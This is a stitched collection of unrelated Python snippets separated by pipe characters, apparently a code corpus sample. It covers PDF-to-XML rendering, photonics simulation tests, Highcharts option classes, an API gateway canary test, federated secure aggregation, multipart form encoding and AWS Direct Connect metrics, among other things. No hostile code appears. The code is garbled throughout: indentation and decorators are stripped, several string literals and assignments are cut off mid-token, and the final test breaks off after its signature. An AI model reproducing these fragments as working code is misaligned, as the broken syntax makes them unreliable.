self.outfp.write(('<text font="%s" bbox="%s" size="%.3f">' % (q(item.fontname), bbox2str(item.bbox), item.size)))
self.write_text(item.get_text())
self.outfp.write('</text>\n')
elif isinstance(item, LTText):
self.outfp.write(('<text>%s</text>\n' % item.get_text()))
elif isinstance(item, LTImage):
if (self.imagewriter is not None):
name = self.imagewriter.export_image(item)
self.outfp.write(('<image src="%s" width="%d" height="%d" />\n' % (q(name), item.width, item.height)))
else:
self.outfp.write(('<image width="%d" height="%d" />\n' % (item.width, item.height)))
else:
assert 0, item
return
render(ltpage)
return
def close(self):
self.write_footer()
return |
def test_perturbed_mediums_copy():
pp_real = td.ParameterPerturbation(heat=td.LinearHeatPerturbation(coeff=(- 0.01), temperature_ref=300, temperature_range=(200, 500)))
pp_complex = td.ParameterPerturbation(heat=td.LinearHeatPerturbation(coeff=0.01j, temperature_ref=300, temperature_range=(200, 500)), charge=td.LinearChargePerturbation(electron_coeff=(- 1e-21), electron_ref=0, electron_range=(0, 1e+20), hole_coeff=(- 2e-21), hole_ref=0, hole_range=(0, 5e+19)))
coords = dict(x=[1, 2], y=[3, 4], z=[5, 6])
temperature = td.SpatialDataArray((300 * np.ones((2, 2, 2))), coords=coords)
electron_density = td.SpatialDataArray((1e+18 * np.ones((2, 2, 2))), coords=coords)
hole_density = td.SpatialDataArray((2e+18 * np.ones((2, 2, 2))), coords=coords)
pmed1 = td.PerturbationMedium(permittivity=3, permittivity_perturbation=pp_real)
pmed2 = td.PerturbationPoleResidue(poles=[(1j, 3), (2j, 4)], poles_perturbation=[(None, pp_real), (pp_complex, None)])
struct = td.Structure(geometry=td.Box(center=(0, 0, 0), size=(1, 1, 1)), medium=pmed2)
scene = td.Scene(medium=pmed1, structures=[struct])
new_scene = scene.perturbed_mediums_copy()
assert isinstance(new_scene.medium, td.Medium)
assert isinstance(new_scene.structures[0].medium, td.PoleResidue)
new_scene = scene.perturbed_mediums_copy(temperature)
new_scene = scene.perturbed_mediums_copy(temperature, None, hole_density)
new_scene = scene.perturbed_mediums_copy(temperature, electron_density, hole_density)
assert isinstance(new_scene.medium, td.CustomMedium)
assert isinstance(new_scene.structures[0].medium, td.CustomPoleResidue) |
def test_owly_short_method_bad_response_status():
params = urlencode({'apiKey': 'TEST_KEY', 'longUrl': expanded})
body = "{'rerrsults': {'shortUrl': shorten}}"
mock_url = f'{owly.api_url}shorten?{params}'
responses.add(responses.GET, mock_url, body=body, status=400, match_querystring=True)
with pytest.raises(ShorteningErrorException):
owly.short(expanded) |
.parametrize('geometry', GEO_TYPES)
def test_to_gds(geometry, tmp_path):
fname = str((tmp_path / f'{geometry.__class__.__name__}.gds'))
geometry.to_gds_file(fname, z=0, gds_cell_name=geometry.__class__.__name__)
cell = gdstk.read_gds(fname).cells[0]
assert (cell.name == geometry.__class__.__name__)
assert (len(cell.polygons) > 0)
fname = str((tmp_path / f'{geometry.__class__.__name__}-empty.gds'))
geometry.to_gds_file(fname, y=1e+30, gds_cell_name=geometry.__class__.__name__)
cell = gdstk.read_gds(fname).cells[0]
assert (cell.name == geometry.__class__.__name__)
assert (len(cell.polygons) == 0) |
class ZshCompletion(CompletionPlugin):
def __init__(self, config_loader: ConfigLoader):
super().__init__(config_loader)
from hydra._internal.core_plugins.bash_completion import BashCompletion
self.delegate = BashCompletion(config_loader)
def install(self) -> None:
self.delegate.install()
def uninstall(self) -> None:
self.delegate.uninstall()
def provides() -> str:
return 'zsh'
def query(self, config_name: Optional[str]) -> None:
self.delegate.query(config_name)
def help(command: str) -> str:
assert (command in ['install', 'uninstall'])
extra_description = 'Zsh is compatible with the Bash shell completion, see the [documentation]( for details.\n '
command_text = f'eval "$({{}} -sc {command}=bash)"'
if (command == 'install'):
return (extra_description + command_text)
return command_text
def _get_exec() -> str:
from hydra._internal.core_plugins.bash_completion import BashCompletion
return BashCompletion._get_exec() |
.usefixtures('use_tmpdir')
def test_that_a_failing_job_shows_error_message_with_context(opened_main_window_clean, qtbot):
gui = opened_main_window_clean
with open('poly_eval.py', 'w', encoding='utf-8') as f:
f.write(dedent(' #!/usr/bin/env python\n\n if __name__ == "__main__":\n raise RuntimeError(\'Argh\')\n '))
os.chmod('poly_eval.py', (((os.stat('poly_eval.py').st_mode | stat.S_IXUSR) | stat.S_IXGRP) | stat.S_IXOTH))
with contextlib.suppress(FileNotFoundError):
shutil.rmtree('poly_out')
simulation_panel = get_child(gui, SimulationPanel)
simulation_mode_combo = get_child(simulation_panel, QComboBox)
simulation_mode_combo.setCurrentText(SingleTestRun.name())
start_simulation = get_child(simulation_panel, QWidget, name='start_simulation')
def handle_dialog():
qtbot.mouseClick(wait_for_child(gui, qtbot, QMessageBox).buttons()[0], Qt.LeftButton)
QTimer.singleShot(500, (lambda : handle_run_path_dialog(gui=gui, qtbot=qtbot, delete_run_path=False)))
def handle_error_dialog(run_dialog):
error_dialog = run_dialog.fail_msg_box
assert error_dialog
text = error_dialog.details_text.toPlainText()
label = error_dialog.label_text.text()
assert ('ERT experiment failed' in label)
expected_substrings = ['Realization: 0 failed after reaching max submit (2)', 'job poly_eval failed', 'Process exited with status code 1', 'Traceback', "raise RuntimeError('Argh')", 'RuntimeError: Argh']
for substring in expected_substrings:
assert (substring in text)
qtbot.mouseClick(error_dialog.box.buttons()[0], Qt.LeftButton)
QTimer.singleShot(500, handle_dialog)
qtbot.mouseClick(start_simulation, Qt.LeftButton)
run_dialog = wait_for_child(gui, qtbot, RunDialog)
qtbot.mouseClick(run_dialog.show_details_button, Qt.LeftButton)
QTimer.singleShot(20000, (lambda : handle_error_dialog(run_dialog)))
qtbot.waitUntil(run_dialog.done_button.isVisible, timeout=100000) |
class CanaryDiffMapping(MappingTest):
parent: AmbassadorTest
target: ServiceType
canary: ServiceType
weight: int
def variants(cls) -> Generator[(Node, None, None)]:
for v in variants(ServiceType):
for w in (0, 10, 50, 100):
(yield cls(v, v.clone('canary'), w, name='{self.target.name}-{self.weight}'))
def init(self, target: ServiceType, canary: ServiceType, weight):
MappingTest.init(self, target)
self.canary = canary
self.weight = weight
def config(self) -> Generator[(Union[(str, Tuple[(Node, str)])], None, None)]:
(yield (self.target, self.format('\n---\napiVersion: getambassador.io/v3alpha1\nkind: Mapping\nname: {self.name}\nhostname: "*"\nprefix: /{self.name}/\nservice: canary.1.example.com\n')))
(yield (self.canary, self.format('\n---\napiVersion: getambassador.io/v3alpha1\nkind: Mapping\nname: {self.name}-canary\nhostname: "*"\nprefix: /{self.name}/\nservice: canary.2.example.com\nweight: {self.weight}\n')))
def queries(self):
for i in range(100):
(yield Query(self.parent.url((self.name + '/'))))
def check(self):
request_hosts = ['canary.1.example.com', 'canary.2.example.com']
hist: Dict[(str, int)] = {}
for r in self.results:
assert r.backend
hist[r.backend.name] = (hist.get(r.backend.name, 0) + 1)
assert r.backend.request
assert (r.backend.request.host in request_hosts), f'Expected host {request_hosts}, got {r.backend.request.host}'
if (self.weight == 0):
assert (hist.get(self.canary.path.k8s, 0) == 0)
assert (hist.get(self.target.path.k8s, 0) == 100)
elif (self.weight == 100):
assert (hist.get(self.canary.path.k8s, 0) == 100)
assert (hist.get(self.target.path.k8s, 0) == 0)
else:
canary = ((100 * hist.get(self.canary.path.k8s, 0)) / len(self.results))
main = ((100 * hist.get(self.target.path.k8s, 0)) / len(self.results))
assert (abs((self.weight - canary)) < 25), f'weight {self.weight} routed {canary}% to canary'
assert (abs((100 - (canary + main))) < 2), f'weight {self.weight} routed only {(canary + main)}% at all?' |
class OptionSeriesAreasplineSonificationContexttracksMappingTime(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def get_tdx_kdata(security_item, start, end):
api = TdxHq_API()
with api.connect():
df = api.get_k_data(security_item['code'], start, end)
df = df[['date', 'code', 'low', 'open', 'close', 'high', 'vol', 'amount']]
df['securityId'] = df['code'].apply((lambda x: 'stock_{}_{}'.format(get_exchange(x), x)))
df['vol'] = df['vol'].apply((lambda x: (x * 100)))
df.columns = KDATA_COLUMN_SINA
return df |
class AutoBackend(AsyncNetworkBackend):
async def _init_backend(self) -> None:
if (not hasattr(self, '_backend')):
backend = current_async_library()
if (backend == 'trio'):
from .trio import TrioBackend
self._backend: AsyncNetworkBackend = TrioBackend()
else:
from .anyio import AnyIOBackend
self._backend = AnyIOBackend()
async def connect_tcp(self, host: str, port: int, timeout: Optional[float]=None, local_address: Optional[str]=None, socket_options: typing.Optional[typing.Iterable[SOCKET_OPTION]]=None) -> AsyncNetworkStream:
(await self._init_backend())
return (await self._backend.connect_tcp(host, port, timeout=timeout, local_address=local_address, socket_options=socket_options))
async def connect_unix_socket(self, path: str, timeout: Optional[float]=None, socket_options: typing.Optional[typing.Iterable[SOCKET_OPTION]]=None) -> AsyncNetworkStream:
(await self._init_backend())
return (await self._backend.connect_unix_socket(path, timeout=timeout, socket_options=socket_options))
async def sleep(self, seconds: float) -> None:
(await self._init_backend())
return (await self._backend.sleep(seconds)) |
class StringDecoder(ByteStringDecoder):
def __init__(self, handle_string_errors='strict'):
self.bytes_errors = handle_string_errors
super().__init__()
_type_str('string')
def from_type_str(cls, abi_type, registry):
return cls()
def decode(self, stream):
raw_data = self.read_data_from_stream(stream)
(data, padding_bytes) = self.split_data_and_padding(raw_data)
value = self.decoder_fn(data, self.bytes_errors)
self.validate_padding_bytes(value, padding_bytes)
return value
def decoder_fn(data, handle_string_errors='strict'):
return data.decode('utf-8', errors=handle_string_errors) |
def get_integration_manifests(integration: str, prerelease: Optional[bool]=False, kibana_version: Optional[str]='') -> list:
epr_search_url = '
if (not prerelease):
prerelease = 'false'
else:
prerelease = 'true'
epr_search_parameters = {'package': f'{integration}', 'prerelease': prerelease, 'all': 'true', 'include_policy_templates': 'true'}
if kibana_version:
epr_search_parameters['kibana.version'] = kibana_version
epr_search_response = requests.get(epr_search_url, params=epr_search_parameters, timeout=10)
epr_search_response.raise_for_status()
manifests = epr_search_response.json()
if (not manifests):
raise ValueError(f'EPR search for {integration} integration package returned empty list')
sorted_manifests = sorted(manifests, key=(lambda p: Version.parse(p['version'])), reverse=True)
print(f"loaded {integration} manifests from the following package versions: {[manifest['version'] for manifest in sorted_manifests]}")
return manifests |
class BigQueryValues(SqlTree):
type: Type
values: List[Sql]
def _compile(self, qb):
cols = list(self.type.elems)
rows = [(((['STRUCT('] + join_comma(((v.compile(qb).code + [' as ', name]) for (name, v) in safezip(cols, row.values)))) + [')']) if isinstance(row, Tuple) else row.compile(qb).code) for row in self.values]
return ((['SELECT * FROM UNNEST(['] + join_comma(rows)) + [']) as item']) |
def extract_flake8_bandit() -> Dict[(str, str)]:
from bandit.core.extension_loader import MANAGER
codes = dict()
for blacklist in MANAGER.blacklist.values():
for check in blacklist:
code = check['id'].replace('B', 'S')
codes[code] = check['message']
for plugin in MANAGER.plugins:
code = plugin.plugin._test_id.replace('B', 'S')
codes[code] = plugin.name.replace('_', ' ')
return codes |
class ThreadedAsyncRunner(Thread):
def __init__(self, loop: Optional[AbstractEventLoop]=None) -> None:
self._loop = (loop or asyncio.new_event_loop())
if self._loop.is_closed():
raise ValueError('Event loop closed.')
super().__init__(daemon=True)
def start(self) -> None:
if (self.is_alive() or self._loop.is_running()):
return
super().start()
self.call(asyncio.sleep(0.001)).result(1)
def run(self) -> None:
_default_logger.debug('Starting threaded asyncio loop...')
asyncio.set_event_loop(self._loop)
self._loop.run_forever()
_default_logger.debug('Asyncio loop has been stopped.')
def call(self, coro: Coroutine[(Any, Any, Any)]) -> Any:
return AnotherThreadTask(coro, self._loop)
def stop(self) -> None:
_default_logger.debug('Stopping...')
if (not self.is_alive()):
return
if self._loop.is_running():
_default_logger.debug('Stopping loop...')
self._loop.call_soon_threadsafe(self._loop.stop)
_default_logger.debug('Wait thread to join...')
self.join(10)
_default_logger.debug('Stopped.') |
(allow_guest=True)
def search(query, path, space):
if (not space):
space = get_space_route(path)
use_redisearch = frappe.db.get_single_value('Wiki Settings', 'use_redisearch_for_search')
if ((not use_redisearch) or (not _redisearch_available)):
result = web_search(query, space, 5)
for d in result:
d.title = (d.title_highlights or d.title)
d.route = d.path
d.content = d.content_highlights
del d.title_highlights
del d.content_highlights
del d.path
return {'docs': result, 'search_engine': 'frappe_web_search'}
from redis.commands.search.query import Query
from redis.exceptions import ResponseError
r = frappe.cache()
query = Query(query).paging(0, 5).highlight(tags=['<b class="match">', '</b>'])
try:
result = r.ft(space).search(query)
except ResponseError:
return {'docs': [], 'search_engine': 'redisearch'}
names = []
for d in result.docs:
(_, name) = d.id.split(':')
names.append(name)
names = list(set(names))
data_by_name = {d.name: d for d in frappe.db.get_all('Wiki Page', fields=['name'], filters={'name': ['in', names]})}
docs = []
for d in result.docs:
(_, name) = d.id.split(':')
doc = data_by_name[name]
doc.title = d.title
doc.route = d.route
doc.content = d.content
docs.append(doc)
return {'docs': docs, 'search_engine': 'redisearch'} |
def stream_encode_multipart(values, threshold=(1024 * 500), boundary=None, charset='utf-8'):
if (boundary is None):
from time import time
from random import random
boundary = ('EmmettFormPart_%s%s' % (time(), random()))
_closure = [BytesIO(), 0, False]
write_binary = _closure[0].write
def write(string):
write_binary(string.encode(charset))
for (key, values) in values.items():
if (not isinstance(values, list)):
values = [values]
for value in values:
write(('--%s\r\nContent-Disposition: form-data; name="%s"' % (boundary, key)))
reader = getattr(value, 'read', None)
if (reader is not None):
filename = getattr(value, 'filename', getattr(value, 'name', None))
content_type = getattr(value, 'content_type', None)
if (content_type is None):
content_type = ((filename and mimetypes.guess_type(filename)[0]) or 'application/octet-stream')
if (filename is not None):
write(('; filename="%s"\r\n' % filename))
else:
write('\r\n')
write(('Content-Type: %s\r\n\r\n' % content_type))
while 1:
chunk = reader(16384)
if (not chunk):
break
write_binary(chunk)
else:
if (not isinstance(value, str)):
value = str(value)
else:
value = to_bytes(value, charset)
write('\r\n\r\n')
write_binary(value)
write('\r\n')
write(('--%s--\r\n' % boundary))
length = int(_closure[0].tell())
_closure[0].seek(0)
return (_closure[0], length, boundary) |
def fl_json_to_dotlist(json_config: Dict[(str, Any)], append_or_override: bool=True) -> List[str]:
dotlist_dict = _flatten_dict(json_config)
dotlist_list = []
for (k, v) in dotlist_dict.items():
if k.endswith('._base_'):
k = k.replace('._base_', '')
config_group = k.split('.')[(- 1)]
config_group = (config_group if (not config_group.isdigit()) else k.split('.')[(- 2)])
k = f'+{config_group}{k}'
dotlist_list.append(f'{k}={v}')
else:
v = _handle_values_for_overrides_list(v)
prefix = ('++' if append_or_override else '')
dotlist_list.append(f'{prefix}{k}={v}')
sorted_dotlist_list = sorted(dotlist_list, key=_hydra_merge_order)
return sorted_dotlist_list |
class SyncSecAggSQServer(SyncSecAggServer):
def __init__(self, *, global_model: IFLModel, channel: Optional[ScalarQuantizationChannel]=None, **kwargs):
init_self_cfg(self, component_class=__class__, config_class=SyncSecAggSQServerConfig, **kwargs)
super().__init__(global_model=global_model, channel=channel, **kwargs)
if (not isinstance(self._channel, ScalarQuantizationChannel)):
raise TypeError('SyncSecAggSQServer expects channel of type ScalarQuantizationChannel,', f' {type(self._channel)} given.')
if (not self._channel.use_shared_qparams):
raise ValueError('SyncSecAggSQServer expects qparams to be shared across all clients. Have you set sec_agg_mode to True in channel config?')
for (n, p) in self.global_model.fl_get_module().named_parameters():
if (p.ndim > 1):
self._secure_aggregator.converters[n].scaling_factor = self.cfg.secagg_scaling_factor_for_quantized
self._global_qparams: Dict[(str, Tuple[(Tensor, Tensor)])] = {}
def global_qparams(self):
return self._global_qparams
def receive_update_from_client(self, message: Message):
message.qparams = self.global_qparams
message = self._channel.client_to_server(message)
self._aggregator.apply_weight_to_update(delta=message.model.fl_get_module(), weight=message.weight)
self._secure_aggregator.params_to_fixedpoint(message.model.fl_get_module())
self._secure_aggregator.apply_noise_mask(message.model.fl_get_module().named_parameters())
self._aggregator.add_update(delta=message.model.fl_get_module(), weight=message.weight)
self._secure_aggregator.update_aggr_overflow_and_model(model=self._aggregator._buffer_module)
def step(self):
aggregated_model = self._aggregator.aggregate()
self._secure_aggregator.apply_denoise_mask(aggregated_model.named_parameters())
self._secure_aggregator.params_to_float(aggregated_model)
self._dequantize(aggregated_model)
FLModelParamUtils.set_gradient(model=self._global_model.fl_get_module(), reference_gradient=aggregated_model)
self._optimizer.step()
def _dequantize(self, aggregated_model: torch.nn.Module):
model_state_dict = aggregated_model.state_dict()
new_state_dict = OrderedDict()
for (name, param) in model_state_dict.items():
if (param.ndim > 1):
(scale, zero_point) = self._global_qparams[name]
int_param = param.data.to(dtype=torch.int8)
q_param = torch._make_per_tensor_quantized_tensor(int_param, scale.item(), int(zero_point.item()))
deq_param = q_param.dequantize()
new_state_dict[name] = deq_param
else:
new_state_dict[name] = param.data
aggregated_model.load_state_dict(new_state_dict)
def update_qparams(self, aggregated_model: torch.nn.Module):
(observer, _) = self._channel.get_observers_and_quantizers()
for (name, param) in aggregated_model.state_dict().items():
observer.reset_min_max_vals()
_ = observer(param.data)
self._global_qparams[name] = observer.calculate_qparams() |
def test_instantiate_target_raising_exception_taking_no_arguments(instantiate_func: Any) -> None:
_target_ = 'tests.instantiate.raise_exception_taking_no_argument'
with raises(InstantiationException, match=dedent(f'''
Error in call to target '{re.escape(_target_)}':
ExceptionTakingNoArgument\('Err message',?\)''').strip()):
instantiate_func({}, _target_=_target_) |
class OptionPlotoptionsFunnelSonificationDefaultinstrumentoptionsMappingFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def update_common_site_config(ddict, bench_path='.'):
filename = os.path.join(bench_path, 'sites', 'common_site_config.json')
if os.path.exists(filename):
with open(filename) as f:
content = json.load(f)
else:
content = {}
content.update(ddict)
with open(filename, 'w') as f:
json.dump(content, f, indent=1, sort_keys=True) |
class UserPermissionMixin(BaseModel):
__table_args__ = (sa.PrimaryKeyConstraint('user_id', 'perm_name', name='pk_users_permissions'), {'mysql_engine': 'InnoDB', 'mysql_charset': 'utf8'})
_attr
def __tablename__(self):
return 'users_permissions'
_attr
def user_id(self):
return sa.Column(sa.Integer, sa.ForeignKey('users.id', onupdate='CASCADE', ondelete='CASCADE'), primary_key=True)
_attr
def perm_name(self):
return sa.Column(sa.Unicode(64), primary_key=True)
('perm_name')
def validate_perm_name(self, key, value):
if (value != value.lower()):
raise AssertionError('perm_name needs to be lowercase')
return value
def __repr__(self):
return ('<UserPermission: %s>' % self.perm_name) |
def test_mode_imputation_with_multiple_variables(df_na):
imputer = CategoricalImputer(imputation_method='frequent', variables=['Studies', 'City'])
X_transformed = imputer.fit_transform(df_na)
X_reference = df_na.copy()
X_reference['City'] = X_reference['City'].fillna('London')
X_reference['Studies'] = X_reference['Studies'].fillna('Bachelor')
assert (imputer.imputer_dict_ == {'Studies': 'Bachelor', 'City': 'London'})
pd.testing.assert_frame_equal(X_transformed, X_reference) |
class OptionSeriesScatter3dSonificationTracksMappingPlaydelay(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class CssPivotFilterBoxPopUpButton(CssStyle.Style):
classname = 'pvtFilterBox button'
_attrs = {'font-weight': 'bold', 'padding': '0 20px', 'margin': 0, 'text-decoration': 'none', 'border-radius': '4px', 'white-space': 'nowrap', 'display': 'inline-block', 'line-height': '20px', '-webkit-appearance': 'none', '-moz-appearance': 'none'}
_hover = {'text-decoration': 'none', 'cursor': 'pointer'}
_focus = {'outline': 0}
_disabled = {'cursor': 'none'}
def customize(self):
self.css({'border': ('1px solid %s' % self.page.theme.greys[4]), 'color': 'white', 'background-color': self.page.theme.colors[(- 1)]})
self.hover.css({'background-color': self.page.theme.colors[0], 'color': self.page.theme.colors[(- 1)]}, important=True) |
class Migration(migrations.Migration):
dependencies = [('references', '0053_office')]
operations = [migrations.AddField(model_name='gtassf133balances', name='disaster_emergency_fund', field=models.ForeignKey(blank=True, db_column='disaster_emergency_fund_code_temp', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='references.DisasterEmergencyFundCode')), migrations.AlterUniqueTogether(name='gtassf133balances', unique_together={('fiscal_year', 'fiscal_period', 'disaster_emergency_fund', 'tas_rendering_label')}), migrations.RunPython(copy_defc_column, reverse_code=migrations.RunPython.noop), migrations.RenameField(model_name='gtassf133balances', old_name='disaster_emergency_fund_code', new_name='disaster_emergency_fund_code_old'), migrations.AlterField(model_name='gtassf133balances', name='disaster_emergency_fund', field=models.ForeignKey(blank=True, db_column='disaster_emergency_fund_code', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='references.DisasterEmergencyFundCode')), migrations.RemoveField(model_name='gtassf133balances', name='disaster_emergency_fund_code_old')] |
class TestInlineHiliteNoClassNoPygments(util.MdCase):
extension = ['pymdownx.highlight', 'pymdownx.inlinehilite']
extension_configs = {'pymdownx.highlight': {'css_class': '', 'use_pygments': False}}
def test_no_class_no_pygments(self):
self.check_markdown('Lets test inline highlight no guessing and no text styling `#!python import module`.', '<p>Lets test inline highlight no guessing and no text styling <code class="language-python">import module</code>.</p>') |
def _context_similarity(ctx_ref, ctx_trg, repeats, same_len):
def alignment(ref, trg):
GAP = (- 2)
def match(a, b):
mult = (1 if ((abs(a) in repeats) or (abs(b) in repeats)) else 2)
if (a != b):
return (- mult)
else:
return mult
(l1, l2) = ((len(ref) + 1), (len(trg) + 1))
table = [[0 for _ in range(l2)] for _ in range(l1)]
if same_len:
for i in range(l1):
table[i][0] = (i * GAP)
for i in range(l2):
table[0][i] = (i * GAP)
for (i, j) in product(range(1, l1), range(1, l2)):
table[i][j] = max((table[(i - 1)][j] + GAP), (table[i][(j - 1)] + GAP), (table[(i - 1)][(j - 1)] + match(ref[(i - 1)], trg[(j - 1)])))
return table[(- 1)][(- 1)]
if ((len(ctx_trg.left) + len(ctx_trg.right)) == 0):
return 0
left = alignment(ctx_ref.left, ctx_trg.left)
right = alignment(ctx_ref.right[::(- 1)], ctx_trg.right[::(- 1)])
return (left + right) |
.skipif((not has_torch), reason='needs PyTorch')
.skipif(has_torch_amp, reason='needs PyTorch without gradient scaling support')
def test_raises_on_old_pytorch():
import torch
scaler = PyTorchGradScaler(enabled=True)
with pytest.raises(ValueError, match='not supported.*1.9.0'):
scaler.scale([torch.tensor([1.0], device='cpu')]) |
_arguments
def count_events(args):
client = EmbeddedNotificationClient(server_uri=args.server_uri)
offset = 0
if args.begin_offset:
offset = args.begin_offset
elif args.begin_time:
offset = client.time_to_offset(time_utils.timestamp_to_datetime(args.begin_time))
res = client.count_events(key=args.key, namespace=args.namespace, sender=args.sender, begin_offset=offset)
print(res[0]) |
_blueprint.route('/api/by_ecosystem/<ecosystem>/<project_name>/', methods=['GET'])
_blueprint.route('/api/by_ecosystem/<ecosystem>/<project_name>', methods=['GET'])
def api_get_project_ecosystem(ecosystem, project_name):
project = models.Project.by_name_and_ecosystem(Session, project_name, ecosystem)
if (not project):
output = {'output': 'notok', 'error': f'No project "{project_name}" found in ecosystem "{ecosystem}"'}
= 404
else:
output = project.__json__(detailed=True)
= 200
jsonout = flask.jsonify(output)
jsonout.status_code =
return jsonout |
('task_function, expected_file, expected_module', [param(data.foo, None, 'tests.data', id='function'), param(data.foo_main_module, data.__file__, None, id='function-main-module'), param(data.Bar, None, 'tests.data', id='class'), param(data.bar_instance, None, 'tests.data', id='class_inst'), param(data.bar_instance_main_module, None, None, id='class_inst-main-module')])
def test_detect_calling_file_or_module_from_task_function(task_function: Callable[(..., None)], expected_file: Optional[str], expected_module: Optional[str]) -> None:
(file, module) = utils.detect_calling_file_or_module_from_task_function(task_function)
assert (file == expected_file)
assert (module == expected_module) |
class CLICommand(RegionalCommand):
def regional_from_cli(cls, parser, argv, cfg):
parser.add_argument('--verbose', action='store_true', help='include each VIF and its status in output', default=cfg('verbose', type=Bool))
stats = ['Average', 'Minimum', 'Maximum', 'p90', 'p95', 'p99', 'p99.9']
parser.add_argument('--stat', metavar='STAT', choices=stats, help=('aggregate on STAT: ' + ', '.join(stats)), default=cfg('stat', type=Choice(*stats), default='p95'))
parser.add_argument('--height', type=int, metavar='LINES', help='height of chart in LINES, a sparkline is used if 1, no charts if 0', default=cfg('height', type=PosInt, default=1))
parser.add_argument('--auto-scale', action='store_true', help='do not use the maximum circuit b/w as height of y-axis', default=cfg('auto_scale', type=Bool, default=False))
timespec = parser.add_mutually_exclusive_group()
timespec.add_argument('--hours', type=int, help='retrieve metrics from HOURS ago', default=cfg('hours', type=PosInt))
timespec.add_argument('--days', type=int, help='retrieve metrics from DAYS ago', default=cfg('days', type=PosInt))
args = parser.parse_args(argv)
return cls(**vars(args))
def __init__(self, regions, height, hours, days, stat, auto_scale, verbose):
super().__init__(regions)
if ((hours is None) and (days is None)):
hours = 1
self.last = ((hours * 3600) if hours else ((days * 3600) * 24))
self.stat = stat
self.height = height
self.auto_scale = auto_scale
self.verbose = verbose
colorama.init()
def regional_execute(self, session, acct, region):
out = io.StringIO()
prefix = f'{acct}/{region}:'
cw = session.client('cloudwatch', region_name=region)
dx = session.client('directconnect', region_name=region)
conn_by_id = {}
for c in dx.describe_connections()['connections']:
conn_by_id[c['connectionId']] = c
if (not conn_by_id):
return ''
vifs_by_conn = defaultdict(list)
for vif in dx.describe_virtual_interfaces()['virtualInterfaces']:
c_id = vif['connectionId']
vifs_by_conn[c_id].append(vif)
metrics = None
if (self.height > 0):
metrics = self._load_dx_metrics(cw, conn_by_id.keys())
for (c_id, conn) in sorted(conn_by_id.items(), key=(lambda c: c[1]['connectionName'])):
vifs = vifs_by_conn[c_id]
if self.verbose:
for vif in vifs:
print(f'{prefix} {_vif2str(vif, conn)}', file=out)
print(f'{prefix} {_conn2str(conn, vifs)}', file=out)
if metrics:
_print_conn_metrics(conn, metrics[c_id], height=self.height, auto_yaxis=self.auto_scale, prefix=prefix, file=out)
return out.getvalue()
def _load_dx_metrics(self, cw, connections):
cwm = CWMetrics(cw, last=self.last)
metrics = defaultdict(dict)
for c_id in connections:
dimension = {'ConnectionId': c_id}
for name in ['ConnectionBpsIngress', 'ConnectionBpsEgress']:
get_values = cwm.add_metric('AWS/DX', name, dimension, self.stat)
metrics[c_id][name] = get_values
for name in ['ConnectionState']:
get_values = cwm.add_metric('AWS/DX', name, dimension, 'Minimum')
metrics[c_id][name] = (lambda f=get_values: ((t, invert(v)) for (t, v) in f()))
cwm.bulk_load()
return metrics |
.skipif(('pandas' not in sys.modules), reason='Pandas is not installed.')
def test_workflow():
import pandas as pd
def my_task(df: pd.DataFrame) -> int:
return len(df[df.columns[0]])
sql_task = SQLite3Task('test', query_template='select * from tracks limit {{.inputs.limit}}', inputs=kwtypes(limit=int), task_config=SQLite3Config(uri=EXAMPLE_DB, compressed=True))
def wf(limit: int) -> int:
return my_task(df=sql_task(limit=limit))
assert (wf(limit=5) == 5) |
def setup_ List[str]=None):
if (not exclude_paths):
exclude_paths = ['/api/controller/heartbeat']
uvicorn_logger = logging.getLogger('uvicorn.access')
if uvicorn_logger:
for path in exclude_paths:
uvicorn_logger.addFilter(EndpointFilter(path=path))
= logging.getLogger('
if |
class OptionSeriesWindbarbSonificationContexttracksMappingPlaydelay(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class OptionSeriesVectorSonificationDefaultspeechoptionsMappingPitch(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get('undefined')
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get('undefined')
def max(self, text: str):
self._config(text, js_type=False)
def min(self):
return self._config_get('undefined')
def min(self, text: str):
self._config(text, js_type=False)
def within(self):
return self._config_get('undefined')
def within(self, text: str):
self._config(text, js_type=False) |
class Transpose(UnaryOp):
_property
def arg_function_spaces(self):
(tensor,) = self.operands
return tensor.arg_function_spaces[::(- 1)]
def arguments(self):
(tensor,) = self.operands
return tensor.arguments()[::(- 1)]
def _output_string(self, prec=None):
(tensor,) = self.operands
return ('(%s).T' % tensor) |
class Node():
previous: 'Node'
next: 'Node'
key: bytes
value: Transaction
def __init__(self, previous: Optional['Node']=None, next: Optional['Node']=None, key: bytes=b'', value=None, value_size: int=0) -> None:
self.previous = (previous if (previous is not None) else self)
self.next = (next if (next is not None) else self)
self.key = key
self.value = value
self.value_size = value_size |
.django_db
def test_parent_recipient_with_id_and_name(recipient_lookup):
